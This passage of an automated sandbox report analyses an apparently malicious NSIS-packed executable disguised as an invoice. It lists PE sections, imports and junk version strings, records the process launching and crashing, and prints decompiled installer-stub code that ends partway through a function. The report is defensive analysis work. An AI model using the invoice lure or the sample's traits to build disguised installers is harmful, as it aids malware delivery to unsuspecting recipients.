                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x6230 | 0x6400 | False | 0.6699609375 | data | 6.44188995255 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x8000 | 0x1274 | 0x1400 | False | 0.4337890625 | data | 5.06106734837 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0xa000 | 0x399078 | 0x600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x3ac000 | 0x988 | 0xa00 | False | 0.455859375 | data | 4.32856157213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_DIALOG | 0x3ac148 | 0x100 | data | English | United States
                                              RT_DIALOG | 0x3ac248 | 0x11c | data | English | United States
                                              RT_DIALOG | 0x3ac364 | 0x60 | data | English | United States
                                              RT_VERSION | 0x3ac3c4 | 0x284 | data | English | United States
                                              RT_MANIFEST | 0x3ac648 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                              Imports

                                              DLL | Import
                                              ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                              SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                              ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                              COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                              GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                              Version Infos

                                              Description | Data
                                              LegalCopyright | Copyright Abkhazian (Latin script)
                                              FileVersion | 8.96.29.2
                                              CompanyName | decoration
                                              LegalTrademarks | Hokkaido
                                              Comments | Kalumpang
                                              ProductName | fire escape
                                              FileDescription | Liv
                                              Translation | 0x0409 0x04e4

                                              Possible Origin

                                              Language of compilation system | Country where language is spoken
                                              English | United States

                                              Network Behavior

                                              UDP Packets


                                              Code Manipulations

                                              System Behavior

                                              General

                                              Start time: 20:19:32
                                              Start date: 22/02/2021
                                              Path: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
                                              Wow64 process (32bit): true
                                              Commandline: 'C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe'
                                              Imagebase: 0x400000
                                              File size: 215032 bytes
                                              MD5 hash: DC22D7783144CFE4DCBB4734ED6A3656
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Reputation: low

                                              General

                                              Start time: 20:19:34
                                              Start date: 22/02/2021
                                              Path: C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit): true
                                              Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736
                                              Imagebase: 0xf0000
                                              File size: 434592 bytes
                                              MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Reputation: high

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                C-Code - Quality: 86%
                                                			_entry_() {
                                                				signed int _t42;
                                                				intOrPtr* _t47;
                                                				CHAR* _t51;
                                                				char* _t53;
                                                				CHAR* _t55;
                                                				void* _t59;
                                                				intOrPtr _t61;
                                                				int _t63;
                                                				int _t66;
                                                				signed int _t67;
                                                				int _t68;
                                                				signed int _t70;
                                                				void* _t94;
                                                				signed int _t110;
                                                				void* _t113;
                                                				void* _t118;
                                                				intOrPtr* _t119;
                                                				char _t122;
                                                				signed int _t141;
                                                				signed int _t142;
                                                				int _t150;
                                                				void* _t151;
                                                				intOrPtr* _t153;
                                                				CHAR* _t156;
                                                				CHAR* _t157;
                                                				void* _t159;
                                                				char* _t160;
                                                				void* _t163;
                                                				void* _t164;
                                                				char _t189;
                                                
                                                				 *(_t164 + 0x18) = 0;
                                                				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                				 *(_t164 + 0x20) = 0;
                                                				 *(_t164 + 0x14) = 0x20;
                                                				SetErrorMode(0x8001); // executed
                                                				_t42 = GetVersion() & 0xbfffffff;
                                                				 *0x7a2f6c = _t42;
                                                				if(_t42 != 6) {
                                                					_t119 = E004064DD(0);
                                                					if(_t119 != 0) {
                                                						 *_t119(0xc00);
                                                					}
                                                				}
                                                				_t156 = "UXTHEME";
                                                				do {
                                                					E0040646F(_t156); // executed
                                                					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                				} while ( *_t156 != 0);
                                                				E004064DD(0xb);
                                                				 *0x7a2f64 = E004064DD(9);
                                                				_t47 = E004064DD(7);
                                                				if(_t47 != 0) {
                                                					_t47 =  *_t47(0x1e);
                                                					if(_t47 != 0) {
                                                						 *0x7a2f6f =  *0x7a2f6f | 0x00000040;
                                                					}
                                                				}
                                                				__imp__#17(_t159);
                                                				__imp__OleInitialize(0); // executed
                                                				 *0x7a3038 = _t47;
                                                				SHGetFileInfoA(0x79e528, 0, _t164 + 0x38, 0x160, 0); // executed
                                                				E004060D4(0x7a2760, "NSIS Error");
                                                				_t51 = GetCommandLineA();
                                                				_t160 = "\"C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe\" ";
                                                				E004060D4(_t160, _t51);
                                                				 *0x7a2f60 = 0x400000;
                                                				_t53 = _t160;
                                                				if("\"C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe\" " == 0x22) {
                                                					 *(_t164 + 0x14) = 0x22;
                                                					_t53 =  &M007A9001;
                                                				}
                                                				_t55 = CharNextA(E00405A97(_t53,  *(_t164 + 0x14)));
                                                				 *(_t164 + 0x1c) = _t55;
                                                				while(1) {
                                                					_t122 =  *_t55;
                                                					_t172 = _t122;
                                                					if(_t122 == 0) {
                                                						break;
                                                					}
                                                					__eflags = _t122 - 0x20;
                                                					if(_t122 != 0x20) {
                                                						L13:
                                                						__eflags =  *_t55 - 0x22;
                                                						 *(_t164 + 0x14) = 0x20;
                                                						if( *_t55 == 0x22) {
                                                							_t55 =  &(_t55[1]);
                                                							__eflags = _t55;
                                                							 *(_t164 + 0x14) = 0x22;
                                                						}
                                                						__eflags =  *_t55 - 0x2f;
                                                						if( *_t55 != 0x2f) {
                                                							L25:
                                                							_t55 = E00405A97(_t55,  *(_t164 + 0x14));
                                                							__eflags =  *_t55 - 0x22;
                                                							if(__eflags == 0) {
                                                								_t55 =  &(_t55[1]);
                                                								__eflags = _t55;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t55 =  &(_t55[1]);
                                                							__eflags =  *_t55 - 0x53;
                                                							if( *_t55 != 0x53) {
                                                								L20:
                                                								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                									L24:
                                                									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                										 *((char*)(_t55 - 2)) = 0;
                                                										__eflags =  &(_t55[2]);
                                                										E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
                                                										L30:
                                                										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                										GetTempPathA(0x400, _t157);
                                                										_t59 = E004032F4(_t172);
                                                										_t173 = _t59;
                                                										if(_t59 != 0) {
                                                											L33:
                                                											DeleteFileA("1033"); // executed
                                                											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
                                                											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                											if(_t61 != 0) {
                                                												L43:
                                                												E0040380D();
                                                												__imp__OleUninitialize();
                                                												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                													__eflags =  *0x7a3014;
                                                													if( *0x7a3014 == 0) {
                                                														L67:
                                                														_t63 =  *0x7a302c;
                                                														__eflags = _t63 - 0xffffffff;
                                                														if(_t63 != 0xffffffff) {
                                                															 *(_t164 + 0x14) = _t63;
                                                														}
                                                														ExitProcess( *(_t164 + 0x14));
                                                													}
                                                													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                													__eflags = _t66;
                                                													_t150 = 2;
                                                													if(_t66 != 0) {
                                                														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                														 *(_t164 + 0x38) = 1;
                                                														 *(_t164 + 0x44) = _t150;
                                                														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                													}
                                                													_t67 = E004064DD(4);
                                                													__eflags = _t67;
                                                													if(_t67 == 0) {
                                                														L65:
                                                														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                														__eflags = _t68;
                                                														if(_t68 != 0) {
                                                															goto L67;
                                                														}
                                                														goto L66;
                                                													} else {
                                                														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                														__eflags = _t70;
                                                														if(_t70 == 0) {
                                                															L66:
                                                															E0040140B(9);
                                                															goto L67;
                                                														}
                                                														goto L65;
                                                													}
                                                												}
                                                												E004057F0( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x7a2f80 == 0) {
                                                												L42:
                                                												 *0x7a302c =  *0x7a302c | 0xffffffff;
                                                												 *(_t164 + 0x18) = E004038E7( *0x7a302c);
                                                												goto L43;
                                                											}
                                                											_t153 = E00405A97(_t160, 0);
                                                											if(_t153 < _t160) {
                                                												L39:
                                                												_t182 = _t153 - _t160;
                                                												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                												if(_t153 < _t160) {
                                                													_t151 = E0040575B(_t185);
                                                													lstrcatA(_t157, "~nsu");
                                                													if(_t151 != 0) {
                                                														lstrcatA(_t157, "A");
                                                													}
                                                													lstrcatA(_t157, ".tmp");
                                                													_t162 = "C:\\Users\\jones\\Desktop";
                                                													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
                                                														_push(_t157);
                                                														if(_t151 == 0) {
                                                															E0040573E();
                                                														} else {
                                                															E004056C1();
                                                														}
                                                														SetCurrentDirectoryA(_t157);
                                                														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                														if(_t189 == 0) {
                                                															E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
                                                														}
                                                														E004060D4(0x7a4000,  *(_t164 + 0x1c));
                                                														_t137 = "A";
                                                														_t163 = 0x1a;
                                                														 *0x7a4400 = "A";
                                                														do {
                                                															E00406167(0, 0x79e128, _t157, 0x79e128,  *((intOrPtr*)( *0x7a2f74 + 0x120)));
                                                															DeleteFileA(0x79e128);
                                                															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe", 0x79e128, 1) != 0) {
                                                																E00405EB3(_t137, 0x79e128, 0);
                                                																E00406167(0, 0x79e128, _t157, 0x79e128,  *((intOrPtr*)( *0x7a2f74 + 0x124)));
                                                																_t94 = E00405773(0x79e128);
                                                																if(_t94 != 0) {
                                                																	CloseHandle(_t94);
                                                																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                																}
                                                															}
                                                															 *0x7a4400 =  *0x7a4400 + 1;
                                                															_t163 = _t163 - 1;
                                                														} while (_t163 != 0);
                                                														E00405EB3(_t137, _t157, 0);
                                                													}
                                                													goto L43;
                                                												}
                                                												 *_t153 = 0;
                                                												_t154 = _t153 + 4;
                                                												if(E00405B5A(_t182, _t153 + 4) == 0) {
                                                													goto L43;
                                                												}
                                                												E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
                                                												E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
                                                												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                												goto L42;
                                                											}
                                                											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                											while( *_t153 != _t110) {
                                                												_t153 = _t153 - 1;
                                                												if(_t153 >= _t160) {
                                                													continue;
                                                												}
                                                												goto L39;
                                                											}
                                                											goto L39;
                                                										}
                                                										GetWindowsDirectoryA(_t157, 0x3fb);
                                                										lstrcatA(_t157, "\\Temp");
                                                										_t113 = E004032F4(_t173);
                                                										_t174 = _t113;
                                                										if(_t113 != 0) {
                                                											goto L33;
                                                										}
                                                										GetTempPathA(0x3fc, _t157);
                                                										lstrcatA(_t157, "Low");
                                                										SetEnvironmentVariableA("TEMP", _t157);
                                                										SetEnvironmentVariableA("TMP", _t157);
                                                										_t118 = E004032F4(_t174);
                                                										_t175 = _t118;
                                                										if(_t118 == 0) {
                                                											goto L43;
                                                										}
                                                										goto L33;
                                                									}
                                                									goto L25;
                                                								}
                                                								_t141 = _t55[4];
                                                								__eflags = _t141 - 0x20;
                                                								if(_t141 == 0x20) {
                                                									L23:
                                                									_t15 = _t164 + 0x20;
                                                									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                									__eflags =  *_t15;
                                                									goto L24;
                                                								}
                                                								__eflags = _t141;
                                                								if(_t141 != 0) {
                                                									goto L24;
                                                								}
                                                								goto L23;
                                                							}
                                                							_t142 = _t55[1];
                                                							__eflags = _t142 - 0x20;
                                                							if(_t142 == 0x20) {
                                                								L19:
                                                								 *0x7a3020 = 1;
                                                								goto L20;
                                                							}
                                                							__eflags = _t142;
                                                							if(_t142 != 0) {
                                                								goto L20;
                                                							}
                                                							goto L19;
                                                						}
                                                					} else {
                                                						goto L12;
                                                					}
                                                					do {
                                                						L12:
                                                						_t55 =  &(_t55[1]);
                                                						__eflags =  *_t55 - 0x20;
                                                					} while ( *_t55 == 0x20);
                                                					goto L13;
                                                				}
                                                				goto L30;
                                                			}


































                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040334A
                                                • GetVersion.KERNEL32 ref: 00403350
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403383
                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033BF
                                                • OleInitialize.OLE32(00000000), ref: 004033C6
                                                • SHGetFileInfoA.SHELL32(0079E528,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033E2
                                                • GetCommandLineA.KERNEL32(007A2760,NSIS Error,?,00000007,00000009,0000000B), ref: 004033F7
                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,00000020,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403433
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403530
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403541
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354D
                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403561
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403569
                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040357A
                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403582
                                                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403596
                                                  • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                  • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                  • Part of subcall function 004038E7: lstrlenA.KERNEL32(007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,73BCFA90), ref: 004039D7
                                                  • Part of subcall function 004038E7: lstrcmpiA.KERNEL32(?,.exe,007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000), ref: 004039EA
                                                  • Part of subcall function 004038E7: GetFileAttributesA.KERNEL32(007A1F00), ref: 004039F5
                                                  • Part of subcall function 004038E7: LoadImageA.USER32 ref: 00403A3E
                                                  • Part of subcall function 004038E7: RegisterClassA.USER32 ref: 00403A7B
                                                  • Part of subcall function 0040380D: CloseHandle.KERNEL32(000002BC,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403644
                                                • ExitProcess.KERNEL32 ref: 00403665
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 00403782
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403789
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A1
                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C0
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004037E4
                                                • ExitProcess.KERNEL32 ref: 00403807
                                                  • Part of subcall function 004057F0: MessageBoxIndirectA.USER32 ref: 0040584B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                • String ID: "$"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $(y$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E72AB1A98() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				CHAR* _v24;
                                                				CHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				CHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				CHAR* _t207;
                                                				signed int _t210;
                                                				void* _t212;
                                                				void* _t214;
                                                				CHAR* _t216;
                                                				void* _t224;
                                                				struct HINSTANCE__* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t228;
                                                				signed short _t230;
                                                				struct HINSTANCE__* _t233;
                                                				struct HINSTANCE__* _t235;
                                                				void* _t236;
                                                				char* _t237;
                                                				void* _t248;
                                                				signed char _t249;
                                                				signed int _t250;
                                                				void* _t254;
                                                				struct HINSTANCE__* _t256;
                                                				void* _t257;
                                                				signed int _t259;
                                                				intOrPtr _t260;
                                                				char* _t263;
                                                				signed int _t268;
                                                				signed int _t271;
                                                				signed int _t273;
                                                				void* _t276;
                                                				void* _t280;
                                                				struct HINSTANCE__* _t282;
                                                				intOrPtr _t285;
                                                				void _t286;
                                                				signed int _t287;
                                                				signed int _t299;
                                                				signed int _t300;
                                                				intOrPtr _t303;
                                                				void* _t304;
                                                				signed int _t308;
                                                				signed int _t311;
                                                				signed int _t314;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				intOrPtr _t319;
                                                				intOrPtr* _t320;
                                                				CHAR* _t321;
                                                				CHAR* _t323;
                                                				CHAR* _t324;
                                                				struct HINSTANCE__* _t325;
                                                				void* _t327;
                                                				signed int _t328;
                                                				void* _t329;
                                                
                                                				_t282 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t329 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t207 = E72AB1215();
                                                				_v24 = _t207;
                                                				_v28 = _t207;
                                                				_v48 = E72AB1215();
                                                				_t320 = E72AB123B();
                                                				_v56 = _t320;
                                                				_v12 = _t320;
                                                				while(1) {
                                                					_t210 = _v32;
                                                					_v60 = _t210;
                                                					if(_t210 != _t282 && _t329 == _t282) {
                                                						break;
                                                					}
                                                					_t319 =  *_t320;
                                                					_t285 = _t319;
                                                					_t212 = _t285 - _t282;
                                                					if(_t212 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t214 = _v60 - _t282;
                                                						if(_t214 == 0) {
                                                							 *_v28 =  *_v28 & 0x00000000;
                                                							__eflags = _t329 - _t282;
                                                							if(_t329 == _t282) {
                                                								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
                                                								_t329 = _t254;
                                                								 *(_t329 + 0x810) = _t282;
                                                								 *(_t329 + 0x814) = _t282;
                                                							}
                                                							_t286 = _v36;
                                                							_t47 = _t329 + 8; // 0x8
                                                							_t216 = _t47;
                                                							_t48 = _t329 + 0x408; // 0x408
                                                							_t321 = _t48;
                                                							 *_t329 = _t286;
                                                							 *_t216 =  *_t216 & 0x00000000;
                                                							 *(_t329 + 0x808) = _t282;
                                                							 *_t321 =  *_t321 & 0x00000000;
                                                							_t287 = _t286 - _t282;
                                                							__eflags = _t287;
                                                							 *(_t329 + 0x80c) = _t282;
                                                							 *(_t329 + 4) = _t282;
                                                							if(_t287 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L42;
                                                								}
                                                								_t327 = 0;
                                                								GlobalFree(_t329);
                                                								_t329 = E72AB12FE(_v24);
                                                								__eflags = _t329 - _t282;
                                                								if(_t329 == _t282) {
                                                									goto L42;
                                                								} else {
                                                									goto L35;
                                                								}
                                                								while(1) {
                                                									L35:
                                                									_t248 =  *(_t329 + 0x14a0);
                                                									__eflags = _t248 - _t282;
                                                									if(_t248 == _t282) {
                                                										break;
                                                									}
                                                									_t327 = _t329;
                                                									_t329 = _t248;
                                                									__eflags = _t329 - _t282;
                                                									if(_t329 != _t282) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t327 - _t282;
                                                								if(_t327 != _t282) {
                                                									 *(_t327 + 0x14a0) = _t282;
                                                								}
                                                								_t249 =  *(_t329 + 0x810);
                                                								__eflags = _t249 & 0x00000008;
                                                								if((_t249 & 0x00000008) == 0) {
                                                									_t250 = _t249 | 0x00000002;
                                                									__eflags = _t250;
                                                									 *(_t329 + 0x810) = _t250;
                                                								} else {
                                                									_t329 = E72AB1534(_t329);
                                                									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
                                                								}
                                                								goto L42;
                                                							} else {
                                                								_t299 = _t287 - 1;
                                                								__eflags = _t299;
                                                								if(_t299 == 0) {
                                                									L31:
                                                									lstrcpyA(_t216, _v48);
                                                									L32:
                                                									lstrcpyA(_t321, _v24);
                                                									goto L42;
                                                								}
                                                								_t300 = _t299 - 1;
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									goto L32;
                                                								}
                                                								__eflags = _t300 != 1;
                                                								if(_t300 != 1) {
                                                									goto L42;
                                                								}
                                                								goto L31;
                                                							}
                                                						} else {
                                                							if(_t214 == 1) {
                                                								_t256 = _v16;
                                                								if(_v40 == _t282) {
                                                									_t256 = _t256 - 1;
                                                								}
                                                								 *(_t329 + 0x814) = _t256;
                                                							}
                                                							L42:
                                                							_v12 = _v12 + 1;
                                                							_v28 = _v24;
                                                							L59:
                                                							if(_v32 != 0xffffffff) {
                                                								_t320 = _v12;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                					}
                                                					_t257 = _t212 - 0x23;
                                                					if(_t257 == 0) {
                                                						__eflags = _t320 - _v56;
                                                						if(_t320 <= _v56) {
                                                							L17:
                                                							__eflags = _v44 - _t282;
                                                							if(_v44 != _t282) {
                                                								L43:
                                                								_t259 = _v32 - _t282;
                                                								__eflags = _t259;
                                                								if(_t259 == 0) {
                                                									_t260 = _t319;
                                                									while(1) {
                                                										__eflags = _t260 - 0x22;
                                                										if(_t260 != 0x22) {
                                                											break;
                                                										}
                                                										_t320 = _t320 + 1;
                                                										__eflags = _v44 - _t282;
                                                										_v12 = _t320;
                                                										if(_v44 == _t282) {
                                                											_v44 = 1;
                                                											L162:
                                                											_v28 =  &(_v28[1]);
                                                											 *_v28 =  *_t320;
                                                											L58:
                                                											_t328 = _t320 + 1;
                                                											__eflags = _t328;
                                                											_v12 = _t328;
                                                											goto L59;
                                                										}
                                                										_t260 =  *_t320;
                                                										_v44 = _t282;
                                                									}
                                                									__eflags = _t260 - 0x2a;
                                                									if(_t260 == 0x2a) {
                                                										_v36 = 2;
                                                										L57:
                                                										_t320 = _v12;
                                                										_v28 = _v24;
                                                										_t282 = 0;
                                                										__eflags = 0;
                                                										goto L58;
                                                									}
                                                									__eflags = _t260 - 0x2d;
                                                									if(_t260 == 0x2d) {
                                                										L151:
                                                										_t303 =  *_t320;
                                                										__eflags = _t303 - 0x2d;
